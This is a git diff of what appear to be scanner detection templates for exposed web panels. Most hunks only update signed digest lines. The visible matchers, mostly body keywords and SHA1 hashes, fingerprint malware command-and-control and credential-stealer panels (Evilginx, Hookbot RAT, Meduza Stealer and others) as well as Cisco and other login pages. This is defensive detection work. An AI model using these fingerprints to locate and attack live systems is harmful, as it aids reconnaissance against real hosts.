- "contains(body, '404 file not found')" - "(\"1a279f5df4103743b823ec2a6a08436fdf63fe30\" == sha1(body))" condition: and -# digest: 4a0a00473045022100f66117aa613792028cebcc42d9db7423777d88c444b4dab2d52ee783d39d2291022067a0b3b9824bc202ed2a5056841e91cc65a0aa445f612969de96486ad0cbe181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd5cd2330b7e2d4096dbe45a8b705242bfb468b852259e14afc4d7068a444f150220237c96a8d367ae034fc8fd5e37492345eab15c7f3366a51e019a768450c75acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml index c9b0c10605..9acf0e641e 100644 --- a/http/exposed-panels/c2/caldera-c2.yaml +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1b48b33f9e658a431608ef7e5e0bf2a65ac9b8318e308275b2118098ac7323002202dc01ffbd25675e08406159da6ce180546948f024dee7060f888bf0ab94df06e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index b4a69cce82..6100bed377 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b187174c24f50ffdb1c8238284b465a9e97891282087de49629a4dfd0314614402204835b7ac9cbb38517294dbb37098f51a8ba69901c98ab64d1b471acf96ed762f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a4d556734af50f37fe66ba5d17f726d3bf5bb0118f41225788b74e06427b60402206d110b54940c6ece284653ee678c48aa88e98095836109fd5ce73b64b2830645:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index 0676958d0c..d5755815ca 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8f988797806487c3954f68ba5190d3c2bd039426b06c57e24f8fb50aa54ace5022100963c074463fb72e56b9770e9b208995ba0870bcbb2caa791a6cf7dde8f942baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a05b1817e04d0643682a561d9e55f4f1ef13604b4d1036366e8d897c3a9bbc9002205b7ab5fbf8790f6c876cd2d7e4712e9ef45d92abf8f072b6018a455b075affb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index 8704c38beb..96e14e4814 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -24,4 +24,4 @@ http: - type: dsl dsl: - "(\"dcb32e6256459d3660fdc90e4c79e95a921841cc\" == sha1(body))" -# digest: 4a0a0047304502204272b0e3e53274ba1d2c28bf3b44ad0945eda9eed8289b6aa5c764a9cb9e6ca8022100964e9d3e83038cadd2a57742e65cc085a6159c9c575ce477dd57749ca658bcea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052f057abc1e056c8c32bf8d2891e13713b1ab7954bbe4b0a6e9708c38a25ebd3022100bcd41dce3d9a23afe4e5ca1b8b85ce3209ac68c14709533258f10bc48977988a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index a337c6bf28..1952131e96 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -26,4 +26,4 @@ http: - "status_code == 200 && contains(body, 'Evilginx')" - "(\"b18d778b4e4b6bf1fd5b2d790c941270145a6a6d\" == sha1(body))" condition: and -# digest: 4a0a00473045022100b054d578c96330ba422da33cffeda19ec169680fd610d9fa3901220a1c4be42f022066ae1460859829e4bd3c2c9fa225379aca75366998df8de19fa6403990b8147c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a3829f74293f6124d98ee4ad6dd20c93d7db14d5f94b27d676c176596aff0d5022100ba9db4fbc6059526b522c2393eb25e1bea8bf8c17e316611cfd5e8c7e3d0f76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml index f2bb9eb10f..c296e0a91b 100644 --- a/http/exposed-panels/c2/hack5-cloud-c2.yaml +++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022023d3630d9d342f93264fc99afdd5678dea442db11cc19985526791f1e77f41ec0220628ae099dd06959f4e6df500639870f72e1de3db53ef1b9d08b62f72fe357a4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e12af4b6dc0aacc6d562825fd0ec6991edf6fb7c43af24aef3513e11c8702f54022052e9442dea4dbc7dc803ef5e8e6d2328e31df8f11277db7d0571b3da76ff8522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index 800de730da..4ff1d0b85d 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -21,4 +21,4 @@ http: - type: dsl dsl: - "status_code == 200 && contains(body, 'HOOKBOT PANEL')" -# digest: 4a0a0047304502203e86af1fb29c1715c97a32465f34376122be2577244cced96954af6edabc4882022100ee3cae8088ba6cffea93389f69192b70a7e712960b1a217a555941b8fe806b7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c04a762363c8d88423e79a4eb341e437ba2610d84079ebd08526f7f1ec4c328e02203e6aa70fb4ac581b98ebbfe3b9e260e64d95b7a61770ef43f37ab24934a87533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/meduza-stealer.yaml b/http/exposed-panels/c2/meduza-stealer.yaml index e2d64c3292..17e43cd56d 100644 --- a/http/exposed-panels/c2/meduza-stealer.yaml +++ b/http/exposed-panels/c2/meduza-stealer.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201857c90bb4873d74e64cdd0d581741a34b5ab85e305a1859784ee605c3badde6022100b2e004b0c7a1761427d06cd37b47dc320a2cb4626e027d5c9fb1ed9a032a7157:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f565fe970d4e382742391146251c9f2d24d729a092491615ccd5f22aef0d25302205f0b77e8b93047651343b010637f09b1c5e4b7542f74b28d5c0f081bb9473be5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml index 9407d10f67..e3d1fda801 100644 --- a/http/exposed-panels/c2/mystic-stealer.yaml +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -23,4 +23,4 @@ http: dsl: - "status_code == 200 && contains(body, 'Mystic Stealer')" condition: and -# digest: 4b0a004830460221009db30abfeb0ff686a7c28a4f176d17f1ef592748be4fd65a61ecc98bf88cb2a6022100d22a311a14764af1763bd5a9aad21c20cdf9dc3c143fac6b6756c6e0c9f9f60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039484c0b93373e5e7308fd8d7d380d80ab626686b05818703deb40617c9229cb022100b060b57fffc5fab831abc43fb46b7f27bbca912c3af94ead20d8acf04fe420f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index 7ae2886353..660f911556 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6d5765201b97e132cd0677063e317267a751e67632712b285e240c66433f4be02207480243445c64e44010d2894574344cebd20434e132ebb8fd910758534594cb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6c217bc8ec396d9eb6264fd6f032ec80d12dcc46661821ec31f90291372e24e02203dcafda17da29630c99778d413868600dfdbe62b811f619a909d63cd159ed3e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index b05a9f341b..82226f9096 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -24,4 +24,4 @@ http: - "status_code == 301 && status_code == 302" - "(\"03609e8e4a0a0ef888327d64ae2dc8950664219e\" == sha1(body))" condition: and -# digest: 490a00463044022063ab516462741e34434d9a9c199377f80e51f522197cb6175504b98fb36141ff02207115b32c0520afbef3c6ed48d4e3e67fc99ad28aa45a8bab9df3384082e67fe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a8064b8e5be6cc4ab5ab8543d53233b4fd857fd72040f9dcc7ce30fc75ba616022100c5470a7a707119ac0cd4eda84e10c1fd1c8285f170af01feca029507df7eaa9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml index ed163b0dc9..61ef9b3d52 100644 --- a/http/exposed-panels/c2/pupyc2.yaml +++ b/http/exposed-panels/c2/pupyc2.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022057d29d7d97cb13a9a35b89dfe318ef030a1df69dbfd1e8a21132fcc0e64b69e2022100bb254b2c1afde50e7e251ed8126e89f75d49eb9b91445812280bf608165ce082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022060e2ba527414009da71d2b5d61b6e4ee695565b87fd1efbd0e19cb203a065986022014f66b0d9025e1ccfe5347ee0a05eea5c15dbda38766f01d394249078a4c73a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml index 71479d7822..101c68a828 100644 --- a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008232f0584107ae1208f1df5e74e599ae1b886c4b700ee62ab850b0b0e929b705022100b3ae8d19dc7d1f170d92c55ad3891d4f79c2c913851eef6d95e7c4d52aaa34ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a665aa354aecaa73bbd5ab244a2d2d4ee6e5bdc18e0daba66e1849533b026ced022100b9c459a8d5e1ffd54560c584b6f5c8ecc64fd3c3d8cf5360e60284d04bdeb186:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml index 821db9b4ab..ac6c9ad529 100644 --- a/http/exposed-panels/c2/supershell-c2.yaml +++ b/http/exposed-panels/c2/supershell-c2.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210091de6113e88b1dac039795b04c1f74947aa27064d8d904ce5d2937331374af5f02207cb591a3025a268582238d89c37bc1d84dd912fb05d35e71d9480d7a3cc9fd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9c0fcd9b24b3a263acb78969fe716aa9da0312cb70c5509eb5b79fc10662e50022100ed849496590862afaa9f8a0cfa29f3ed1b621f1430688cba705289b5931d8dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index 8a26d2021e..58b8ae9ef9 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -27,4 +27,4 @@ http: - "status_code == 404" - "(\"057f3b5488605b4d224d038e340866e2cdfed4a3\" == sha1(body))" condition: and -# digest: 4a0a00473045022100d611d7a526bfb1c041ade83ada99949e2306854350ec715f40beba72ec98b6b10220406bc07f5bb48c3398fe534d989b2ab250b58eddc9592bb4933702801b491073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054c3cee28570a6e92f667c29d2b76b51ff8a871e8201136d0ef7767fba4949e502207fc7b93b94a621b5a4bd5b34fa4025a0591f8c4012740b45a0465e8e0f501bc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 0f8fda5aac..c235b60b58 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -58,4 +58,4 @@ http: group: 1 regex: - "<div class='versionInfo'>Version (.*) |" -# digest: 4a0a00473045022100b3110f2d77b3f6513cc8f7e915660505f5f1414f89715d1fc1a562bde90075fa02201dcff79552b3f5d1622fc45bda5868f3a4b43b6bc5edf01210dc46a04630f1a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207fecb5e7c1e7984c7e501984ec58102f09cbff040b480c8fec107df85b5e610d022006f787084598d9136915bb6a88b0f6134ea9463b263346b4586300520a870367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cas-login.yaml b/http/exposed-panels/cas-login.yaml index b5d77d6898..466f87eb50 100644 --- a/http/exposed-panels/cas-login.yaml +++ b/http/exposed-panels/cas-login.yaml @@ -32,4 +32,4 @@ http: - type: word words: - 'Central Authentication Service' -# digest: 490a00463044022071e6304b70fbfc04d0475ccc3c7afb5e7187ec3e6c88b8b91bd1789e76ea082402201a862c543154732f3ef39d434ba812008f027a1b6e63ffe548733a18da838acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b754aa73faa7a8eb943e00275bc395117108304a4acf536d967a89364352e8e022100f8aaa07e8860e7fa04b4cd07cabe47f039a03eca1459d2a7acf1309b8e3be3e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/casaos-panel.yaml b/http/exposed-panels/casaos-panel.yaml index 17fbcb2c03..692ddac51e 100644 --- a/http/exposed-panels/casaos-panel.yaml +++ b/http/exposed-panels/casaos-panel.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058935ba694b70a8f74d99a1b4c984faae5edb522532b19bc4a7a69e41c8fc16f022100f0cd7fb9e9a5fb38a4fec5656cd650dc1fc28e3945e61c42e9efce72c91f88be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f0cf4e8c38e949e072718beb3416c8dd350c8175d045a024c8971e7c74141ab022038106666f0eb4962180327b98faa88b99b8128192108ec41d7ac86b5a62a34d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/casdoor-login.yaml b/http/exposed-panels/casdoor-login.yaml index 768bacaee8..0b492bcba6 100644 --- a/http/exposed-panels/casdoor-login.yaml +++ b/http/exposed-panels/casdoor-login.yaml @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220316022fd744519e112b4d069cf87e3d538d1e90049cf9bb12c29e39fa9e20c53022052f0186966dc197f9d2a5ff7d2d003db012151a3ed523747f863d2baba75104f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077f20a4965393e8d70db40243c0063f6b6c5cab5ffc91a4e2c0ef463db827cdd022048e1cf28506b77aca8466529939370bbf7464f93ec72d34f529e443a43741e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/casemanager-panel.yaml b/http/exposed-panels/casemanager-panel.yaml index dc546b3df7..7712f0e919 100644 --- a/http/exposed-panels/casemanager-panel.yaml +++ b/http/exposed-panels/casemanager-panel.yaml @@ -27,4 +27,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008447814425311e3a8a6362ed6be13f0bbb83b1e9fb7bb6e77b6d19b841ae8e2202210092e4a35f8947d75f884dcff402b9bb9c480035d2e1acf044645fb1a9d58e35ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205250da024100bb00e1f61e94c81598cecc8a54d98281ea88f4ba1b41e8cd46190221008d44875afa8a9c24efd02c71fdc557f9f2d3658a05914b3270d96874cf6fff51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/caton-network-manager-system.yaml b/http/exposed-panels/caton-network-manager-system.yaml index 830c9c5ea5..5d13fbf21c 100644 --- a/http/exposed-panels/caton-network-manager-system.yaml +++ b/http/exposed-panels/caton-network-manager-system.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202595b63dc1084511885407d1974656b953d2fb97a03210ed0dec6d0dddc083a7022100b173a74eeed99b9af8931be9e1090fb9fde0e2dcb49ab83a73c177cc9d15e640:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af33cedf76bde6d1a620e73de647fab03f462e4f9cd9e355c5fd830130806193022077e0226f5f77bddf0c7b58ac3a708dcf44ecefc3fac2a2f969e261f145f112c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ccm-detect.yaml b/http/exposed-panels/ccm-detect.yaml index dbea138b5a..2ea0ec207a 100644 --- a/http/exposed-panels/ccm-detect.yaml +++ b/http/exposed-panels/ccm-detect.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022033cce126fb6fa470ae9d526d69571dffadc9262a58ba1e555c7a0397657bfcb50221008971333263854d2cd0f3ec2647ea8cf44e417e37322c5a859f17da893149b653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d8054cfaf5ee7ca5eed10465a8a1e23f85ce78fdece58504e9be1e9e781c68b0221008730938e41a01c427ee3351f0da71e0354f1c0cc53f35f1c2f5ad2484f0b955a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/centreon-panel.yaml b/http/exposed-panels/centreon-panel.yaml index 3a5ebe2336..7af011bd09 100644 --- a/http/exposed-panels/centreon-panel.yaml +++ b/http/exposed-panels/centreon-panel.yaml @@ -44,4 +44,4 @@ http: group: 1 regex: - 'v. (.*)' -# digest: 4a0a00473045022100e54e060d59c1e789e7ecc1e0f642623e61c78ffcee6d2efc7deb7f1ffa3ff4ce02200e6f5ab71a0032b17c4e3ddf4fa1ab0ac9971a90138b6b2f8dfd5c98f8acb732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206afdc426a5872acc234d3a98803e7e68b5e249cfbfe126d64424367efb8613dc02210087789f4ac125c088781ec8c6c2be8d97f7c3b65de0e25aba0cde138d7bc52fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/changedetection-panel.yaml b/http/exposed-panels/changedetection-panel.yaml index bf62f88b06..7d1b8be579 100644 --- a/http/exposed-panels/changedetection-panel.yaml +++ b/http/exposed-panels/changedetection-panel.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e3b7e37f469df077d15f2702fa2cdd703513432c774b1ac5e6612003e31f53a70220701c4b635c29aa92a5596d32b42dd587eb32603d7cf7fbad99657cd4da4633a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index bec999ce36..4cfea266bb 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -39,4 +39,4 @@ http: regex: - '<div id="version">([0-9.a-z]+)<\/div>' - '<div id="foot">Version: ([0-9.a-z]+)' -# digest: 4a0a00473045022100c05097a066ea3ac7388836e614a90ffedf62317936eb547238190ff82cfd3eb002204baefd146e350a8551aa70d283be7f7aadb163d0a2638cc443aff536d8327293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b310dc2eb2c1633e9d63b74c63df7b1dfee65e41b00f931d7ba59a93b5655910022100dc129226cfb39444cfd03083edd885b212c317aedc94300267e185c5b25d6290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/checkpoint/ssl-network-extender.yaml b/http/exposed-panels/checkpoint/ssl-network-extender.yaml index 43f430fc67..624aa5cfd7 100644 --- a/http/exposed-panels/checkpoint/ssl-network-extender.yaml +++ b/http/exposed-panels/checkpoint/ssl-network-extender.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203df8b22d7fb2b37146faed807588a9f3c151a69e5c74042865bde82f9804290002207a05e05c6b45a7ae956c66f15b115d4194577d923597f25d5ed32464ba31d62b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008677cdbcb2c06d24e27b2c06817b1f6bc93db007b4c2ae14ce701a95265c166202203bae0c51bd45bbb7a6dc4231ba2f9b5c6bb71b2e3325e8941119cddc142f5e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/chronos-panel.yaml b/http/exposed-panels/chronos-panel.yaml index aabc6e2ab0..1f59e60ef1 100644 --- a/http/exposed-panels/chronos-panel.yaml +++ b/http/exposed-panels/chronos-panel.yaml @@ -41,4 +41,4 @@ http: group: 1 regex: - '(?i)chronos\s+([0-9.-]+)' -# digest: 4a0a00473045022100f7620b7259aaecbbd6061354c2be0f96b724f8beb5fba454f32d0b229b1b84ad02202afbe0574ebd3569667fcfaae9234367d35c2e706bca838bfd5703fb5096956e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009f7438da9d01090973ae8536e098964867b8691a578fe89fb6613124a89f114022100c3107046e922d9da17b81e71a7de12a2eb23c2f6370713c4ea47bc9313a125b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml index e0aaac88e8..0ebfef6196 100644 --- a/http/exposed-panels/cisco-firepower-panel.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -39,4 +39,4 @@ http: group: 1 regex: - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" -# digest: 4a0a004730450220026366c1c44b76bd077fdcb97ff6b07b21fbe1b9b87a25d978c0aa9f8e0a9bd3022100f60575f7d011eacf77f7a25d0c6b632bba00038b40986cd2fc2cdee645ee975e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220038221cfd474cf96d18842a52bc6445ca4041ed6a80333506d054dcf3bbe5fd8022025d4d69faa51eb24fb92855e6eaec6c403d09a2885b63324206c271d800d703a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-unity-panel.yaml b/http/exposed-panels/cisco-unity-panel.yaml index 210792249c..e56bc08180 100644 --- a/http/exposed-panels/cisco-unity-panel.yaml +++ b/http/exposed-panels/cisco-unity-panel.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067ca0395c5118f81dca1fb693524759e613d662a69a2460743b6d6e403ba551802206cc24a8eb5dd2c5b8e3a429129800013dbc0e6a82d95180966478212fba5c6af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml index 0514ce24e8..26dc715a24 100644 --- a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml +++ b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100debdf18d610809bfcc415f9da481b40e52a2cc7a359b3c437a52772fe258f2cb02210086b989391c0cf2682aae6d6fdffb2e85c09966944250a3c5ca4c32bdec8be0dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009917c0358df31375f02f7c551bac45eb9be985bc2cf03787fe7f5bb32ffdd9c202205e850a19b48d44e3ba3bca147036e04efec49c87db97b77833b0a81c0458484d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-asa-panel.yaml b/http/exposed-panels/cisco/cisco-asa-panel.yaml index 03b963d458..939c80acda 100644 --- a/http/exposed-panels/cisco/cisco-asa-panel.yaml +++ b/http/exposed-panels/cisco/cisco-asa-panel.yaml @@ -29,4 +29,4 @@ http: - "/+CSCOU+/portal.css" - "SSL VPN Service" condition: or -# digest: 4a0a0047304502203e82a198cf6173511c2a289a850a43eed0b3113376aeee2bf54d72f1c005b8dc022100f0e36a800baed2f6e7dd642af2a1c4ac55178dcb405cd925d13dde8eea621676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4dc07548054223c2c69d33933c27302357ffc49c775dd180fcf07f8f9b1cb2f022002df46873ec98e3b00f999ad2f396ad29783a946141120d513646cb54426e8c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-edge-340.yaml b/http/exposed-panels/cisco/cisco-edge-340.yaml index 7f2098c09c..caba7ccc19 100644 --- a/http/exposed-panels/cisco/cisco-edge-340.yaml +++ b/http/exposed-panels/cisco/cisco-edge-340.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207f465775b3c58ee181e59540bb7d65ba1505d8981474eee6903db9853c6e57bc022001a24d30bc1e3114e3daeabd175b058c6b6c741486dad03c2f430a47ce9f9ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091474c0452b33a305c01c0ac300ac54d1b63f8ec5dde3443eb6a71dfe5f2ed260220389e1eddcee9428b13e44ade0c745937fd3bc4fe6b90851f2f99cf9f1db2efcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-expressway-panel.yaml b/http/exposed-panels/cisco/cisco-expressway-panel.yaml index 9de3c2a082..922fc28da2 100644 --- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml +++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml @@ -32,4 +32,4 @@ http: group: 1 regex: - 'Cisco\s+(?:Expressway|Expway)\s+([A-Za-z\s]+)<\/legend>' -# digest: 490a00463044022017cea3c30c4e5c14448f32affcc2a76041719a68ce7b1b73917ca5b7add1b4bd022002fbfafa35171c448235c328299b377ed67c036b2cf72fca115108cf1b88f207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072ff0d78e16c7789ee82205c94f1efea59dedb5d2deb469c5137640a14dc61f6022100ea4b5e671f90362a0a83b148b1ecafd2abab1fa530cb14295fed23da04d36fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-finesse-login.yaml b/http/exposed-panels/cisco/cisco-finesse-login.yaml index ff8298d87d..1b14d0c89c 100644 --- a/http/exposed-panels/cisco/cisco-finesse-login.yaml +++ b/http/exposed-panels/cisco/cisco-finesse-login.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e4a6a65f6bf1bce38173fefdb2a3b4258678ab84875fb1e341979373373df894022100f3d89de3cbbd86a90200f0e68044d4379fff4fb846b680c1c78e51015123ee5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d27be65e4f1cf54a326dca789038ac71a17041b8dc66de5d5e21afdaac6a2dbc022100d93c74d718f47106c2f4b0a464ce034b77359b96841b2cc161e77c4ca0deb850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-integrated-login.yaml b/http/exposed-panels/cisco/cisco-integrated-login.yaml index 449bdaf726..5be7001654 100644 --- a/http/exposed-panels/cisco/cisco-integrated-login.yaml +++ b/http/exposed-panels/cisco/cisco-integrated-login.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a0dd981470c642b51b1f5ba6b22d72992ed695c05b1aeb9d3d0eac8741a7057022100aaecd798319368dc048b399829ce9a2fb1e8a886fc19f92c3e54f3a9b267bde7:922c64590222798bb761d5b6d8e72950 